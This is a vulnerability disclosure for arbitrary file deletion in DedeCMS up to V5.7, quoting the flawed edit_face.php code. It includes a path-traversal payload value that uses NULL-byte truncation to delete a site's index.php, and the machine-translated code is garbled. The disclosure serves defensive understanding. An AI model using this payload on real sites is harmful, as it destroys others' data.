DedeCms & lt; = V5.7 (Latest Version) Arbitrary File Deletion Vulnerability

Condition of exploits:
Magic_quotes_gpc = Off: Any suffix file can be deleted.
Magic_quotes_gpc = On can delete jpg | gif | png suffix File
The PHP version requires that NULL bytes be truncated.
 
./Member/edit_face.php,./member/edit_space_info.php and other files all have similar code for modifying user portraits, space logos, and other images.
However, the program does not strictly filter the path of the old image (in fact, this parameter does not need to be submitted by the user), so that the user can delete any file or delete any image.
This type of vulnerability has been reported on the Internet for a long time, but not only jpg | gif | png image files can be deleted. When PHP supports NULL bytes truncation and magic_quotes_gpc = Off,
You can delete any type of files.
 
Take edit_face.php as an example. This file also has an SQL injection vulnerability, which can cause administrator password leakage,
For details, see DedeCMS latest bug analysis.
 
//./Member/edit_face.php
<? Php
Require_once (dirname (_ FILE _). "/config. php"); // This is the key and affects the exploitation of vulnerabilities.
// The first two sentences in config. php are very handy, as shown below:
// Require_once (dirname (_ FILE _). '/../include/common. inc. php ');
// Require_once (DEDEINC. '/filter. inc. php'); // overwrite the variable
 
CheckRank (); // check user registration
$ Menutype = 'config ';
 
If (! Isset ($ dopost ))
{
$ Dopost = '';
}
If (! Isset ($ backurl ))
{
$ Backurl = 'edit _ face. php ';
}
If ($ dopost = 'save ')
{
$ Maxlength = $ pai_max_face * 1024;
$ Userdir = $ pai_user_dir. '/'. $ pai_ml-> M_ID;
 
If (! Preg_match ("# ^". $ userdir. "#", $ oldface ))
{
$ Oldface = '';
}
 
If (is_uploaded_file ($ face ))
{
// Www.2cto.com bypasses the above mess of judgment statements to bring the program process here
If (@ filesize ($ _ FILES ['face'] ['tmp _ name'])> $ maxlength)
{
ShowMsg ("the Avatar file you uploaded exceeds the system size limit: {$ pai_max_face} K! ", '-1 ');
Exit ();
}
// Delete the old image (to prevent file extensions from being different, for example, the original image is gif and later the image is jpg)
If (preg_match ("#. (jpg | gif | png) $ # I", $ oldface) & file_exists ($ pai_basedir. $ oldface ))
{
/* Only determines whether the final result is the end of the. (jpg | gif | png) file and whether the file exists. If no malicious characters such as '..' are filtered, any directory can be returned for deletion.
Judge whether the above regular expressions and files exist
If magic_quotes_gpc = Off because of the above vulnerability _ RunMagicQuotes function becomes paper tiger
Submit oldface =/f/uploads/userup/6/.../../index.php000000.png
You can delete index. php under the root directory of the website.
 
*/
@ Unlink ($ pai_basedir. $ oldface); // Delete the object
}
// Upload a new job image
$ Face = MemberUploads ('face', $ oldface, $ pai_ml-> M_ID, 'image', 'myface', 180,180 );
}

By c4rp3nt3r@0x50sec.org